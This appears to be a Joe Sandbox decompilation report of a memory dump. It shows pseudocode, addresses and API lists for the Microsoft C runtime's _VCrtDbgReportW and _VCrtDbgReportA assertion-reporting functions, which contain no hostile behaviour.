    							E00B7DBD0(E00B899D0(_t243, _t280, _t303, _t305, _t307 - 0x3028, 0x1000, L"_CrtDbgReport: String too long or IO Error"), _t217, L"wcscpy_s(szOutMessage, 4096, L\"_CrtDbgReport: String too long or IO Error\")", L"_VCrtDbgReportW", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x221, 0);
    							_t313 = _t313 + 0x24;
    						}
    					}
    					 *(_t307 - 0x7044) = 0;
    					_t285 = _t307 - 0x3028;
    					_t166 = E00B7DC00(L00B92F40(0, _t307 - 0x1020, 0x1000, _t307 - 0x3028, 0xffffffff), 0x16, 0x22, L"wcstombs_s(((void *)0), szOutMessage2, 4096, szOutMessage, ((size_t)-1))", L"_VCrtDbgReportW", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x22b, 0);
    					_t315 = _t313 + 0x34;
    					 *(_t307 - 0x7044) = _t166;
    					if( *(_t307 - 0x7044) != 0) {
    						E00B7DBD0(E00B80CC0(_t243, _t307 - 0x1020, _t303, _t305, _t307 - 0x1020, 0x1000, "_CrtDbgReport: String too long or Invalid characters in String"), _t209, L"strcpy_s(szOutMessage2, 4096, \"_CrtDbgReport: String too long or Invalid characters in String\")", L"_VCrtDbgReportW", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x22d, 0);
    						_t315 = _t315 + 0x24;
    					}
    					if( *0xd13018 != 0 ||  *0xd13014 != 0) {
    						 *(_t307 - 0x704c) = 0;
    						 *(_t307 - 0x7048) = 0;
    						L00B81250(_t243, _t303, _t305, 0xf);
    						_t315 = _t315 + 4;
    						 *(_t307 - 4) = 1;
    						_t285 =  *0xd13018;
    						 *(_t307 - 0x704c) =  *0xd13018;
    						while( *(_t307 - 0x704c) != 0) {
    							 *(_t307 - 0x7050) = 0;
    							_t285 =  *(_t307 - 0x704c);
    							_t207 =  *(( *(_t307 - 0x704c))[6])( *(_t307 + 8), _t307 - 0x1020, _t307 - 0x7050);
    							_t315 = _t315 + 0xc;
    							if(_t207 == 0) {
    								 *(_t307 - 0x704c) = ( *(_t307 - 0x704c))[2];
    								continue;
    							} else {
    								 *(_t307 - 0x1024) =  *(_t307 - 0x7050);
    								 *(_t307 - 0x302c) = 1;
    							}
    							break;
    						}
    						if( *(_t307 - 0x302c) == 0) {
    							_t285 =  *0xd13014;
    							 *(_t307 - 0x7048) =  *0xd13014;
    							while( *(_t307 - 0x7048) != 0) {
    								 *(_t307 - 0x7054) = 0;
    								_t285 =  *(_t307 - 0x7048);
    								_t203 =  *(( *(_t307 - 0x7048))[6])( *(_t307 + 8), _t307 - 0x3028, _t307 - 0x7054);
    								_t315 = _t315 + 0xc;
    								if(_t203 == 0) {
    									 *(_t307 - 0x7048) = ( *(_t307 - 0x7048))[2];
    									continue;
    								} else {
    									 *(_t307 - 0x1024) =  *(_t307 - 0x7054);
    									 *(_t307 - 0x302c) = 1;
    								}
    								goto L43;
    							}
    						}
    						L43:
    						 *(_t307 - 4) = 0;
    						E00B8948A();
    					}
    					if( *(_t307 - 0x302c) == 0) {
    						if( *0xd13010 != 0) {
    							 *(_t307 - 0x7058) = 0;
    							_t285 = _t307 - 0x7058;
    							_t200 =  *0xd13010( *(_t307 + 8), _t307 - 0x1020, _t307 - 0x7058);
    							_t315 = _t315 + 0xc;
    							if(_t200 != 0) {
    								_t285 =  *(_t307 - 0x7058);
    								 *(_t307 - 0x1024) =  *(_t307 - 0x7058);
    								 *(_t307 - 0x302c) = 1;
    							}
    						}
    						if( *(_t307 - 0x302c) == 0) {
    							if(( *(0xd11d4c +  *(_t307 + 8) * 4) & 0x00000001) != 0) {
    								_t285 =  *(_t307 + 8);
    								if( *(0xd11d58 +  *(_t307 + 8) * 4) != 0xffffffff) {
    									_t181 =  *(_t307 + 8);
    									_t263 =  *(0xd11d58 + _t181 * 4);
    									 *((intOrPtr*)(_t307 - 0x8074)) = GetFileType( *(0xd11d58 + _t181 * 4));
    									if( *((intOrPtr*)(_t307 - 0x8074)) == 2) {
    										_t184 = E00B899A0(_t263, _t307 - 0x3028);
    										_t315 = _t315 + 4;
    										_t285 =  *(_t307 + 8);
    										if(WriteConsoleW( *(0xd11d58 +  *(_t307 + 8) * 4), _t307 - 0x3028, _t184, _t307 - 0x705c, 0) == 0) {
    											if(GetLastError() == 6) {
    												goto L57;
    											} else {
    											}
    										} else {
    										}
    									} else {
    										L57:
    										 *(_t307 - 0x8064) = 0;
    										_t190 = E00B7DC00(L00B92F40(_t307 - 0x8064, _t307 - 0x8060, 0x1000, _t307 - 0x3028, 0xffffffff), 0x16, 0x22, L"wcstombs_s(&ret, szaOutMessage, 4096, szOutMessage, ((size_t)-1))", L"_VCrtDbgReportW", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x27e, 0);
    										_t315 = _t315 + 0x34;
    										 *((intOrPtr*)(_t307 - 0x8068)) = _t190;
    										if( *((intOrPtr*)(_t307 - 0x8068)) == 0 ||  *((intOrPtr*)(_t307 - 0x8068)) == 0x50) {
    											if( *(_t307 - 0x8064) > 0) {
    												 *(_t307 - 0x8064) =  *(_t307 - 0x8064) - 1;
    											}
    											_t267 =  *(_t307 + 8);
    											_t285 =  *(0xd11d58 + _t267 * 4);
    											WriteFile( *(0xd11d58 + _t267 * 4), _t307 - 0x8060,  *(_t307 - 0x8064), _t307 - 0x705c, 0);
    										} else {
    											_t195 = E00B899A0(_t307 - 0x705c, _t307 - 0x3028);
    											_t315 = _t315 + 4;
    											_t269 =  *(_t307 + 8);
    											_t285 =  *(0xd11d58 + _t269 * 4);
    											WriteFile( *(0xd11d58 + _t269 * 4), _t307 - 0x3028, _t195 << 1, _t307 - 0x705c, 0);
    										}
    									}
    								}
    							}
    							if(( *(0xd11d4c +  *(_t307 + 8) * 4) & 0x00000002) != 0) {
    								_t285 = _t307 - 0x3028;
    								OutputDebugStringW(_t307 - 0x3028);
    							}
    							if(( *(0xd11d4c +  *(_t307 + 8) * 4) & 0x00000004) != 0) {
    								 *(_t307 - 0x5030) = 0;
    								if( *(_t307 + 0x10) != 0) {
    									E00B7DBD0(E00B93970( *(_t307 + 0x10),  *(_t307 + 0x10), _t307 - 0x5030, 0x1000, 0xa), _t179, L"_itow_s(nLine, szLineMessage, 4096, 10)", L"_VCrtDbgReportW", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x29c, 0);
    									_t315 = _t315 + 0x28;
    								}
    								asm("sbb ecx, ecx");
    								_t285 = _t307 - 0x5030;
    								 *(_t307 - 0x1024) = E00B7D7D0(_t243, _t307 - 0x5030, _t303, _t305,  *(_t307 + 8),  *(_t307 + 0xc),  ~( *(_t307 + 0x10)) & _t307 - 0x00005030,  *((intOrPtr*)(_t307 + 0x14)), _t307 - 0x7030);
    							}
    						}
    					}
    				} else {
    					_t241 = E00B7DBD0(E00B93970(_t307 - 0x5030,  *(_t307 + 0x10), _t307 - 0x5030, 0x1000, 0xa), _t240, L"_itow_s(nLine, szLineMessage, 4096, 10)", L"_VCrtDbgReportW", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x1f0, 0);
    					OutputDebugStringW(L"Second Chance Assertion Failed: File ");
    					if( *(_t307 + 0xc) == 0) {
    						 *(_t307 - 0x806c) = L"<file unknown>";
    					} else {
    						_t241 =  *(_t307 + 0xc);
    						 *(_t307 - 0x806c) =  *(_t307 + 0xc);
    					}
    					OutputDebugStringW( *(_t307 - 0x806c));
    					OutputDebugStringW(L", Line ");
    					_t285 = _t307 - 0x5030;
    					OutputDebugStringW(_t307 - 0x5030);
    					OutputDebugStringW("\n");
    					E00B885E0(_t241);
    					 *(_t307 - 0x1024) = 0xffffffff;
    				}
    				 *(_t307 - 4) = 0xfffffffe;
    				E00B89717();
    				_t170 =  *(_t307 - 0x1024);
    				 *[fs:0x0] =  *((intOrPtr*)(_t307 - 0x10));
    				_pop(_t304);
    				_pop(_t306);
    				_pop(_t244);
    				return E00B805D0(_t170, _t244,  *(_t307 - 0x1c) ^ _t307, _t285, _t304, _t306);
    			}





























    0x00b88f1f
    0x00b88fcc
    0x00b88fd9
    0x00b88fe4
    0x00b88fea
    0x00b89003
    0x00b89008
    0x00b8900b
    0x00b89018
    0x00b8903c
    0x00b89041
    0x00b89041
    0x00b8904f
    0x00b89058
    0x00b8908a
    0x00b8908f
    0x00b8908f
    0x00b89058
    0x00b89096
    0x00b8909c
    0x00b890aa
    0x00b8909e
    0x00b8909e
    0x00b8909e
    0x00b890e6
    0x00b890eb
    0x00b890eb
    0x00b89110
    0x00b89120
    0x00b89125
    0x00b8912c
    0x00b8913b
    0x00b8915d
    0x00b8916d
    0x00b89172
    0x00b89172
    0x00b891a5
    0x00b891aa
    0x00b891aa
    0x00b891b1
    0x00b892c1
    0x00b892c6
    0x00b891b7
    0x00b891b7
    0x00b891c8
    0x00b891d3
    0x00b891df
    0x00b891e3
    0x00b891f7
    0x00b891fe
    0x00b89203
    0x00b89206
    0x00b89213
    0x00b89237
    0x00b8923c
    0x00b8923c
    0x00b8923f
    0x00b89244
    0x00b8924a
    0x00b89253
    0x00b89285
    0x00b8928a
    0x00b8928a
    0x00b8928d
    0x00b892c9
    0x00b892ef
    0x00b8930d
    0x00b89312
    0x00b89315
    0x00b89322
    0x00b89354
    0x00b89359
    0x00b89359
    0x00b89363
    0x00b89372
    0x00b8937c
    0x00b89388
    0x00b8938d
    0x00b89390
    0x00b89397
    0x00b8939d
    0x00b893b4
    0x00b893bd
    0x00b893d9
    0x00b893e2
    0x00b893e4
    0x00b893e9
    0x00b893ae
    0x00000000
    0x00b893eb
    0x00b893f1
    0x00b893f7
    0x00b893f7
    0x00000000
    0x00b893e9
    0x00b8940c
    0x00b8940e
    0x00b89414
    0x00b8942b
    0x00b89434
    0x00b89450
    0x00b89459
    0x00b8945b
    0x00b89460
    0x00b89425
    0x00000000
    0x00b89462
    0x00b89468
    0x00b8946e
    0x00b8946e
    0x00000000
    0x00b89460
    0x00b8942b
    0x00b8947c
    0x00b8947c
    0x00b89483
    0x00b89483
    0x00b8949c
    0x00b894a9
    0x00b894ab
    0x00b894b5
    0x00b894c7
    0x00b894cd
    0x00b894d2
    0x00b894d4
    0x00b894da
    0x00b894e0
    0x00b894e0
    0x00b894d2
    0x00b894f1
    0x00b89504
    0x00b8950a
    0x00b89515
    0x00b8951b
    0x00b8951e
    0x00b8952c
    0x00b89539
    0x00b8954d
    0x00b89552
    0x00b8955d
    0x00b89570
    0x00b89580
    0x00000000
    0x00000000
    0x00b89582
    0x00000000
    0x00b89572
    0x00b8953b
    0x00b89587
    0x00b89587
    0x00b895d0
    0x00b895d5
    0x00b895d8
    0x00b895e5
    0x00b8962c
    0x00b89637
    0x00b89637
    0x00b89654
    0x00b89657
    0x00b8965f
    0x00b895f0
    0x00b89600
    0x00b89605
    0x00b89612
    0x00b89615
    0x00b8961d
    0x00b8961d
    0x00b895e5
    0x00b89539
    0x00b89515
    0x00b89672
    0x00b89674
    0x00b8967b
    0x00b8967b
    0x00b8968e
    0x00b89692
    0x00b8969d
    0x00b896d0
    0x00b896d5
    0x00b896d5
    0x00b896e8
    0x00b896ea
    0x00b89703
    0x00b89703
    0x00b8968e
    0x00b894f1
    0x00b88f25
    0x00b88f56
    0x00b88f63
    0x00b88f6d
    0x00b88f7a
    0x00b88f6f
    0x00b88f6f
    0x00b88f72
    0x00b88f72
    0x00b88f8b
    0x00b88f96
    0x00b88f9c
    0x00b88fa3
    0x00b88fae
    0x00b88fb4
    0x00b88fb9
    0x00b88fb9
    0x00b89709
    0x00b89710
    0x00b89729
    0x00b89732
    0x00b8973a
    0x00b8973b
    0x00b8973c
    0x00b8974a

    APIs
    • InterlockedIncrement.KERNEL32(00D11D48), ref: 00B88F17
    • __invoke_watson_if_error.LIBCMTD ref: 00B88F56
    • OutputDebugStringW.KERNEL32(Second Chance Assertion Failed: File ), ref: 00B88F63
    • OutputDebugStringW.KERNEL32(00B75010), ref: 00B88F8B
    • OutputDebugStringW.KERNEL32(, Line ), ref: 00B88F96
    • OutputDebugStringW.KERNEL32(?), ref: 00B88FA3
    • OutputDebugStringW.KERNEL32(00B74FFC), ref: 00B88FAE
    • _wcscat_s.LIBCMTD ref: 00B89164
      • Part of subcall function 00B92F70: __invalid_parameter.LIBCMTD ref: 00B92FE2
    • __invoke_watson_if_error.LIBCMTD ref: 00B8916D
      • Part of subcall function 00B7DBD0: __invoke_watson.LIBCMTD ref: 00B7DBF1
    • _wcscat_s.LIBCMTD ref: 00B8919C
      • Part of subcall function 00B92F70: _memset.LIBCMT ref: 00B9304F
      • Part of subcall function 00B92F70: __invalid_parameter.LIBCMTD ref: 00B930AB
    • __invoke_watson_if_error.LIBCMTD ref: 00B891A5
    • __snwprintf_s.LIBCMTD ref: 00B891FE
      • Part of subcall function 00B89970: __vsnwprintf_s_l.LIBCMTD ref: 00B89992
    • __invoke_watson_if_oneof.LIBCMTD ref: 00B89237
    • _wcscpy_s.LIBCMTD ref: 00B8927C
    • __invoke_watson_if_error.LIBCMTD ref: 00B89285
    • __invoke_watson_if_oneof.LIBCMTD ref: 00B8930D
    • _wcscpy_s.LIBCMTD ref: 00B8934B
    • __invoke_watson_if_error.LIBCMTD ref: 00B89354
    • __itow_s.LIBCMTD ref: 00B88F4D
      • Part of subcall function 00B93970: _xtow_s@20.LIBCMTD ref: 00B9399B
    • __strftime_l.LIBCMTD ref: 00B89003
    • __invoke_watson_if_oneof.LIBCMTD ref: 00B8903C
    • _wcscpy_s.LIBCMTD ref: 00B89081
    • __invoke_watson_if_error.LIBCMTD ref: 00B8908A
    • _wcscpy_s.LIBCMTD ref: 00B890DD
    • __invoke_watson_if_error.LIBCMTD ref: 00B890E6
    • _wcscat_s.LIBCMTD ref: 00B89117
    • __invoke_watson_if_error.LIBCMTD ref: 00B89120
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: __invoke_watson_if_error$DebugOutputString$_wcscpy_s$__invoke_watson_if_oneof_wcscat_s$__invalid_parameter$IncrementInterlocked__invoke_watson__itow_s__snwprintf_s__strftime_l__vsnwprintf_s_l_memset_xtow_s@20
    • String ID: %s(%d) : %s$(*_errno())$, Line $<file unknown>$Assertion failed!$Assertion failed: $P$Second Chance Assertion Failed: File $_CrtDbgReport: String too long or IO Error$_CrtDbgReport: String too long or Invalid characters in String$_VCrtDbgReportW$_itow_s(nLine, szLineMessage, 4096, 10)$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrptt.c$strcpy_s(szOutMessage2, 4096, "_CrtDbgReport: String too long or Invalid characters in String")$wcscat_s(szLineMessage, 4096, L"\n")$wcscat_s(szLineMessage, 4096, L"\r")$wcscat_s(szLineMessage, 4096, szUserMessage)$wcscpy_s(szLineMessage, 4096, szFormat ? L"Assertion failed: " : L"Assertion failed!")$wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")$wcscpy_s(szUserMessage, 4096, L"_CrtDbgReport: String too long or IO Error")$wcstombs_s(&ret, szaOutMessage, 4096, szOutMessage, ((size_t)-1))$wcstombs_s(((void *)0), szOutMessage2, 4096, szOutMessage, ((size_t)-1))
    • API String ID: 2252013794-3875623755
    • Opcode ID: b2bfeb70ead50d8c6d8d5e1f3fe69de5ff63f78c04fe0ba117bd8fb2be86154e
    • Instruction ID: b781fc2042546c632a907d550387a4862d5419236158760b753553be2b3f95b5
    • Opcode Fuzzy Hash: b2bfeb70ead50d8c6d8d5e1f3fe69de5ff63f78c04fe0ba117bd8fb2be86154e
    • Instruction Fuzzy Hash: E7127374D40314EADB20EF54DC5ABEA73F4AB04745F1481D8F61DA62E1DBB4AA84CFA0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E00B886DE(struct _OVERLAPPED* __ecx) {
    				CHAR* _t147;
    				long _t160;
    				void* _t164;
    				void* _t167;
    				void* _t171;
    				struct _OVERLAPPED* _t179;
    				struct _OVERLAPPED* _t197;
    				struct _OVERLAPPED** _t198;
    				void* _t208;
    				void* _t209;
    				void* _t259;
    				void* _t260;
    				void* _t261;
    				void* _t262;
    				signed int _t263;
    				void* _t265;
    				void* _t267;
    				void* _t269;
    				void* _t271;
    
    				_t210 = __ecx;
    				if(InterlockedIncrement(0xd11d48) <= 0) {
    					if( *((intOrPtr*)(_t263 + 0x18)) != 0) {
    						 *(_t263 - 0x5034) = 0;
    						 *(_t263 - 0x5038) =  *(L00B80C60(_t210));
    						 *(L00B80C60( *(L00B80C60(_t210)))) = 0;
    						_t236 = _t263 - 0x5030;
    						_t197 = E00B92320(_t263 - 0x5030, 0x1000, 0xfeb,  *((intOrPtr*)(_t263 + 0x18)),  *((intOrPtr*)(_t263 + 0x1c)));
    						_t265 = _t265 + 0x14;
    						 *(_t263 - 0x5034) = _t197;
    						if( *(_t263 - 0x5034) < 0) {
    							E00B7DC00( *((intOrPtr*)(L00B80C60(_t236))), 0x16, 0x22, L"(*_errno())", L"_VCrtDbgReportA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x12d, 0);
    							_t265 = _t265 + 0x20;
    						}
    						_t198 = L00B80C60(_t236);
    						_t210 =  *(_t263 - 0x5038);
    						 *_t198 =  *(_t263 - 0x5038);
    						if( *(_t263 - 0x5034) < 0) {
    							E00B7DBD0(E00B80CC0(_t208, _t210, _t259, _t261, _t263 - 0x5030, 0x1000, "_CrtDbgReport: String too long or IO Error"), _t199, L"strcpy_s(szUserMessage, 4096, \"_CrtDbgReport: String too long or IO Error\")", L"_VCrtDbgReportA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x130, 0);
    							_t265 = _t265 + 0x24;
    						}
    					}
    					if( *(_t263 + 8) == 2) {
    						if( *((intOrPtr*)(_t263 + 0x18)) == 0) {
    							 *((intOrPtr*)(_t263 - 0x5068)) = "Assertion failed!";
    						} else {
    							 *((intOrPtr*)(_t263 - 0x5068)) = "Assertion failed: ";
    						}
    						_t210 = _t263 - 0x4030;
    						E00B7DBD0(E00B80CC0(_t208, _t263 - 0x4030, _t259, _t261, _t263 - 0x4030, 0x1000,  *((intOrPtr*)(_t263 - 0x5068))), _t192, L"strcpy_s(szLineMessage, 4096, szFormat ? \"Assertion failed: \" : \"Assertion failed!\")", L"_VCrtDbgReportA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x135, 0);
    						_t265 = _t265 + 0x24;
    					}
    					E00B7DBD0(E00B8FC60(_t208, _t210, _t259, _t261, _t263 - 0x4030, 0x1000, _t263 - 0x5030), _t136, L"strcat_s(szLineMessage, 4096, szUserMessage)", L"_VCrtDbgReportA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x137, 0);
    					_t267 = _t265 + 0x24;
    					if( *(_t263 + 8) == 2) {
    						_t234 =  *(_t263 + 8);
    						if(( *(0xd11d4c +  *(_t263 + 8) * 4) & 0x00000001) != 0) {
    							E00B7DBD0(E00B8FC60(_t208, _t234, _t259, _t261, _t263 - 0x4030, 0x1000, "\r"), _t189, L"strcat_s(szLineMessage, 4096, \"\\r\")", L"_VCrtDbgReportA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x13c, 0);
    							_t267 = _t267 + 0x24;
    						}
    						_t210 = _t263 - 0x4030;
    						E00B7DBD0(E00B8FC60(_t208, _t263 - 0x4030, _t259, _t261, _t263 - 0x4030, 0x1000, 0xb7122c), _t186, L"strcat_s(szLineMessage, 4096, \"\\n\")", L"_VCrtDbgReportA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x13d, 0);
    						_t267 = _t267 + 0x24;
    					}
    					if( *(_t263 + 0xc) == 0) {
    						E00B7DBD0(E00B80CC0(_t208, _t263 - 0x4030, _t259, _t261, _t263 - 0x3028, 0x1000, _t263 - 0x4030), _t138, L"strcpy_s(szOutMessage, 4096, szLineMessage)", L"_VCrtDbgReportA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x14b, 0);
    						_t269 = _t267 + 0x24;
    					} else {
    						 *(_t263 - 0x503c) = 0;
    						 *(_t263 - 0x5040) =  *(L00B80C60(_t210));
    						 *(L00B80C60(_t210)) = 0;
    						_push(_t263 - 0x4030);
    						_t233 =  *(_t263 + 0x10);
    						_push( *(_t263 + 0x10));
    						_t179 = E00B8C5E0( *(_t263 + 0x10), _t263 - 0x3028, 0x1000, 0xfff, "%s(%d) : %s",  *(_t263 + 0xc));
    						_t269 = _t267 + 0x1c;
    						 *(_t263 - 0x503c) = _t179;
    						if( *(_t263 - 0x503c) < 0) {
    							E00B7DC00( *(L00B80C60(_t233)), 0x16, 0x22, L"(*_errno())", L"_VCrtDbgReportA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x144, 0);
    							_t269 = _t269 + 0x20;
    						}
    						 *(L00B80C60(_t233)) =  *(_t263 - 0x5040);
    						if( *(_t263 - 0x503c) < 0) {
    							E00B7DBD0(E00B80CC0(_t208, _t233, _t259, _t261, _t263 - 0x3028, 0x1000, "_CrtDbgReport: String too long or IO Error"), _t182, L"strcpy_s(szOutMessage, 4096, \"_CrtDbgReport: String too long or IO Error\")", L"_VCrtDbgReportA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x147, 0);
    							_t269 = _t269 + 0x24;
    						}
    					}
    					 *(_t263 - 0x5044) = 0;
    					 *(_t263 - 0x5048) = 0;
    					_t240 = _t263 - 0x5044;
    					 *(_t263 - 0x5048) = E00B91B10(_t263 - 0x5044, _t263 - 0x2020, 0x1000, _t263 - 0x3028, 0xffffffff);
    					E00B7DC00( *(_t263 - 0x5048), 0x16, 0x22, L"e = mbstowcs_s(&ret, szOutMessage2, 4096, szOutMessage, ((size_t)-1))", L"_VCrtDbgReportA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x150, 0);
    					_t271 = _t269 + 0x34;
    					if( *(_t263 - 0x5048) != 0) {
    						E00B7DBD0(E00B899D0(_t208, _t263 - 0x2020, _t259, _t261, _t263 - 0x2020, 0x1000, L"_CrtDbgReport: String too long or Invalid characters in String"), _t173, L"wcscpy_s(szOutMessage2, 4096, L\"_CrtDbgReport: String too long or Invalid characters in String\")", L"_VCrtDbgReportA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x152, 0);
    						_t271 = _t271 + 0x24;
    					}
    					if( *0xd13018 != 0 ||  *0xd13014 != 0) {
    						 *(_t263 - 0x5050) = 0;
    						 *(_t263 - 0x504c) = 0;
    						L00B81250(_t208, _t259, _t261, 0xf);
    						_t271 = _t271 + 4;
    						 *(_t263 - 4) = 1;
    						_t240 =  *0xd13018;
    						 *(_t263 - 0x5050) =  *0xd13018;
    						while( *(_t263 - 0x5050) != 0) {
    							 *(_t263 - 0x5054) = 0;
    							_t240 =  *(_t263 - 0x5050);
    							_t171 =  *(( *(_t263 - 0x5050))[0xc])( *(_t263 + 8), _t263 - 0x3028, _t263 - 0x5054);
    							_t271 = _t271 + 0xc;
    							if(_t171 == 0) {
    								 *(_t263 - 0x5050) = ( *(_t263 - 0x5050))[4];
    								continue;
    							}
    							 *(_t263 - 0x302c) = 1;
    							 *(_t263 - 0x2024) =  *(_t263 - 0x5054);
    							break;
    						}
    						if( *(_t263 - 0x302c) != 0) {
    							L43:
    							 *(_t263 - 4) = 0;
    							E00B88C75();
    							goto L44;
    						}
    						_t240 =  *0xd13014;
    						 *(_t263 - 0x504c) =  *0xd13014;
    						while( *(_t263 - 0x504c) != 0) {
    							 *(_t263 - 0x5058) = 0;
    							_t240 =  *(_t263 - 0x504c);
    							_t167 =  *(( *(_t263 - 0x504c))[0xc])( *(_t263 + 8), _t263 - 0x2020, _t263 - 0x5058);
    							_t271 = _t271 + 0xc;
    							if(_t167 == 0) {
    								 *(_t263 - 0x504c) = ( *(_t263 - 0x504c))[4];
    								continue;
    							}
    							 *(_t263 - 0x302c) = 1;
    							 *(_t263 - 0x2024) =  *(_t263 - 0x5058);
    							goto L43;
    						}
    						goto L43;
    					} else {
    						L44:
    						if( *(_t263 - 0x302c) == 0) {
    							if( *0xd13010 != 0) {
    								 *(_t263 - 0x505c) = 0;
    								_t240 = _t263 - 0x505c;
    								_t164 =  *0xd13010( *(_t263 + 8), _t263 - 0x3028, _t263 - 0x505c);
    								_t271 = _t271 + 0xc;
    								if(_t164 != 0) {
    									 *(_t263 - 0x302c) = 1;
    									_t240 =  *(_t263 - 0x505c);
    									 *(_t263 - 0x2024) =  *(_t263 - 0x505c);
    								}
    							}
    							if( *(_t263 - 0x302c) == 0) {
    								if(( *(0xd11d4c +  *(_t263 + 8) * 4) & 0x00000001) != 0 &&  *(0xd11d58 +  *(_t263 + 8) * 4) != 0xffffffff) {
    									_t160 = E00B805E0(_t263 - 0x3028);
    									_t271 = _t271 + 4;
    									WriteFile( *(0xd11d58 +  *(_t263 + 8) * 4), _t263 - 0x3028, _t160, _t263 - 0x5060, 0);
    								}
    								if(( *(0xd11d4c +  *(_t263 + 8) * 4) & 0x00000002) != 0) {
    									OutputDebugStringA(_t263 - 0x3028);
    								}
    								_t240 =  *(_t263 + 8);
    								if(( *(0xd11d4c +  *(_t263 + 8) * 4) & 0x00000004) != 0) {
    									 *(_t263 - 0x4030) = 0;
    									if( *(_t263 + 0x10) != 0) {
    										E00B7DBD0(E00B92350(_t263 - 0x4030,  *(_t263 + 0x10), _t263 - 0x4030, 0x1000, 0xa), _t157, L"_itoa_s(nLine, szLineMessage, 4096, 10)", L"_VCrtDbgReportA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x1a2, 0);
    										_t271 = _t271 + 0x28;
    									}
    									asm("sbb edx, edx");
    									_t240 =  *(_t263 + 8);
    									 *(_t263 - 0x2024) = L00B89F40(_t208,  *(_t263 + 8), _t259, _t261,  *(_t263 + 8),  *(_t263 + 0xc),  ~( *(_t263 + 0x10)) & _t263 - 0x00004030,  *((intOrPtr*)(_t263 + 0x14)), _t263 - 0x5030);
    								}
    							}
    						}
    						L58:
    						 *(_t263 - 4) = 0xfffffffe;
    						E00B88DDF();
    						_t147 =  *(_t263 - 0x2024);
    						 *[fs:0x0] =  *((intOrPtr*)(_t263 - 0x10));
    						_pop(_t260);
    						_pop(_t262);
    						_pop(_t209);
    						return E00B805D0(_t147, _t209,  *(_t263 - 0x1c) ^ _t263, _t240, _t260, _t262);
    					}
    				}
    				E00B7DBD0(E00B92350(_t210,  *(_t263 + 0x10), _t263 - 0x4030, 0x1000, 0xa), _t204, L"_itoa_s(nLine, szLineMessage, 4096, 10)", L"_VCrtDbgReportA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrptt.c", 0x119, 0);
    				OutputDebugStringA("Second Chance Assertion Failed: File ");
    				if( *(_t263 + 0xc) == 0) {
    					 *(_t263 - 0x5064) = "<file unknown>";
    				} else {
    					 *(_t263 - 0x5064) =  *(_t263 + 0xc);
    				}
    				_t240 =  *(_t263 - 0x5064);
    				OutputDebugStringA( *(_t263 - 0x5064));
    				OutputDebugStringA(", Line ");
    				OutputDebugStringA(_t263 - 0x4030);
    				OutputDebugStringA(0xb7122c);
    				E00B885E0(_t263 - 0x4030);
    				 *(_t263 - 0x2024) = 0xffffffff;
    				goto L58;
    			}






















    0x00b886de
    0x00b886eb
    0x00b88798
    0x00b8879e
    0x00b887af
    0x00b887ba
    0x00b887d2
    0x00b887d9
    0x00b887de
    0x00b887e1
    0x00b887ee
    0x00b88812
    0x00b88817
    0x00b88817
    0x00b8881a
    0x00b8881f
    0x00b88825
    0x00b8882e
    0x00b88860
    0x00b88865
    0x00b88865
    0x00b8882e
    0x00b8886c
    0x00b88872
    0x00b88880
    0x00b88874
    0x00b88874
    0x00b88874
    0x00b888ac
    0x00b888bc
    0x00b888c1
    0x00b888c1
    0x00b888f6
    0x00b888fb
    0x00b88902
    0x00b88904
    0x00b88911
    0x00b88943
    0x00b88948
    0x00b88948
    0x00b8896b
    0x00b8897b
    0x00b88980
    0x00b88980
    0x00b88987
    0x00b88a97
    0x00b88a9c
    0x00b8898d
    0x00b8898d
    0x00b8899e
    0x00b889a9
    0x00b889b5
    0x00b889b6
    0x00b889b9
    0x00b889d4
    0x00b889d9
    0x00b889dc
    0x00b889e9
    0x00b88a0d
    0x00b88a12
    0x00b88a12
    0x00b88a20
    0x00b88a29
    0x00b88a5b
    0x00b88a60
    0x00b88a60
    0x00b88a63
    0x00b88a9f
    0x00b88aa9
    0x00b88ac8
    0x00b88ad7
    0x00b88afe
    0x00b88b03
    0x00b88b0d
    0x00b88b3f
    0x00b88b44
    0x00b88b44
    0x00b88b4e
    0x00b88b5d
    0x00b88b67
    0x00b88b73
    0x00b88b78
    0x00b88b7b
    0x00b88b82
    0x00b88b88
    0x00b88b9f
    0x00b88ba8
    0x00b88bc4
